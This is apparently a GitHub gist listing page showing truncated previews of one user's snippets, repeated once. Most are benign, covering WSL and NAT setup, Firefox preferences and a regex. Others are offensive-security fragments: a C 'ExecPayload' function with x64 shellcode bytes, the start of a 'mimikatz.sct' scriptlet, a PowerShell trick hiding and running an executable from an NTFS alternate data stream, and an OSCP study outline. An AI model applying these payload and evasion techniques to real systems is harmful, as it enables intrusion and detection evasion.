Óscar Andreu oscarandreu

## gist:f0609af973409da1f50058ad1028134a
Enable WSL if not done
Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
Enable-WindowsOptionalFeature -Online -FeatureName VirtualMachinePlatform

wsl --set-default-version 2
wsl --list --verbose
wsl --set-version <Distro> 2
wsl --list --verbose

## execute_c_payload.c
static bool ExecPayload()
{
    char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
                        "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
                        "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
                        "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
                        "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
                        "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
                        "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
                        "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"

## user.js
// Mozilla User Preferences
// To change a preference value, you can either:
// - modify it via the UI (e.g. via about:config in the browser); or
// - set it within a user.js file in your profile (create it if it doesn't exist).
//
// Profile folder location on different systems:
// Windows: C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\xxxxxxxx.default
// Mac OS X: Users/<username>/Library/Application Support/Firefox/Profiles/xxxxxxxx.default
// Linux: /home/<username>/.mozilla/firefox/xxxxxxxx.default

## regex: Negative look-arounds
Only gets the <loc> lines from:
```xml
	<url>
		<loc>https://asdf.net/55/s.i.v.-search</loc>
		<lastmod>2020-06-15</lastmod>
		<changefreq>weekly</changefreq>
		<priority>0.5</priority>
	</url>
	<url>
		<loc>https://asdf.net/catalogue/64/catalogue-pro</loc>

## mimikatz.sct
<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>

## alternate_data_streams_example.txt
Set-Content -path .\hello.txt -value $(Get-Content $(Get-Command calc.exe).Path -readcount 0 -encoding byte) -encoding byte -stream exestream

wmic process call create $(Resolve-Path .\hello.txt:exestream)


Set-Content -path .\test:$INDEX_ALLOCATION -value "asdf" -stream $INDEX_ALLOCATION

## NAT_Adapter.ps
Get-NetAdapter
New-NetIPAddress -IPAddress 192.168.0.1 -PrefixLength 24 -InterfaceIndex 7
New-NetNat -Name MyNATnetwork -InternalIPInterfaceAddressPrefix 192.168.0.0/24

## vim_arrows_problem
:set term=builtin_ansi

## Preparación OSCP.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              1 star
            
          
                oscarandreu
                / Preparación OSCP.md
            
            
              Created
              March 24, 2019 19:29
                — forked from s4vitar/Preparación OSCP.md
            
          
    Preparación para el OSCP (by s4vitar)


Penetration Testing with Kali Linux (PWK) course and Offensive Security Certified Professional (OSCP) Cheat Sheet

Índice y Estructura Principal


Antecedentes - Experiencia Personal
Buffer Overflow Windows (25 puntos)

Fuzzing


Calculando el Offset (Tamaño del Búffer)


## jolt_concat_fields.json
[{
    "operation": "modify-default-beta",
    "spec": {
      "*": {
        "PK": "=concat(@(1,CHASSISNO),'_',@(1,VIN))"
      }
    }
}]
	Enable WSL if not done
	Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
	Enable-WindowsOptionalFeature -Online -FeatureName VirtualMachinePlatform

	wsl --set-default-version 2
	wsl --list --verbose
	wsl --set-version <Distro> 2
	wsl --list --verbose
	static bool ExecPayload()
	{
	char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
	"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
	"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
	"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
	"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
	"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
	"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
	"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
	// Mozilla User Preferences
	// To change a preference value, you can either:
	// - modify it via the UI (e.g. via about:config in the browser); or
	// - set it within a user.js file in your profile (create it if it doesn't exist).
	//
	// Profile folder location on different systems:
	// Windows: C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\xxxxxxxx.default
	// Mac OS X: Users/<username>/Library/Application Support/Firefox/Profiles/xxxxxxxx.default
	// Linux: /home/<username>/.mozilla/firefox/xxxxxxxx.default
	Only gets the <loc> lines from:
	```xml
	<url>
	<loc>https://asdf.net/55/s.i.v.-search</loc>
	<lastmod>2020-06-15</lastmod>
	<changefreq>weekly</changefreq>
	<priority>0.5</priority>
	</url>
	<url>
	<loc>https://asdf.net/catalogue/64/catalogue-pro</loc>
	<?XML version="1.0"?>
	<scriptlet>

	<registration
	description="Bandit"
	progid="Bandit"
	version="1.00"
	classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>
	Set-Content -path .\hello.txt -value $(Get-Content $(Get-Command calc.exe).Path -readcount 0 -encoding byte) -encoding byte -stream exestream

	wmic process call create $(Resolve-Path .\hello.txt:exestream)


	Set-Content -path .\test:$INDEX_ALLOCATION -value "asdf" -stream $INDEX_ALLOCATION
	Get-NetAdapter
	New-NetIPAddress -IPAddress 192.168.0.1 -PrefixLength 24 -InterfaceIndex 7
	New-NetNat -Name MyNATnetwork -InternalIPInterfaceAddressPrefix 192.168.0.0/24
	[{
	"operation": "modify-default-beta",
	"spec": {
	"*": {
	"PK": "=concat(@(1,CHASSISNO),'_',@(1,VIN))"
	}
	}
	}]